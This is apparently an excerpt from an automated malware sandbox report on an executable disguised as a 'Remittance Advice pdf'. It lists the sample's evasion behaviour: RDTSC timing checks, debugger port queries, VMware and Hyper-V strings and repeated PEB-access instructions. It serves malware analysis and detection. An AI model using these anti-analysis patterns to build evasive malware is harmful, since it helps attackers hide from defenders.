          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E9DA4C push 0041E6D0h; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 00000000104183C4 second address: 00000000104183CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 000000001041875E second address: 0000000010418764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000027083C4 second address: 00000000027083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000270875E second address: 0000000002708764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04976DE6 rdtsc
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 0000000E.00000000.473119386.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000E.00000000.473071942.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000E.00000000.462518967.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000E.00000000.473071942.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000E.00000000.462518967.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000E.00000000.472871335.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000E.00000000.472871335.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000E.00000000.473119386.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 0000000E.00000000.439337198.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04976DE6 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04964D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04957D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04973D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04978EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04968E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04948794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04950050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04950050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04939100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04954120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04954120 mov eax, dword ptr fs:[00000030h]
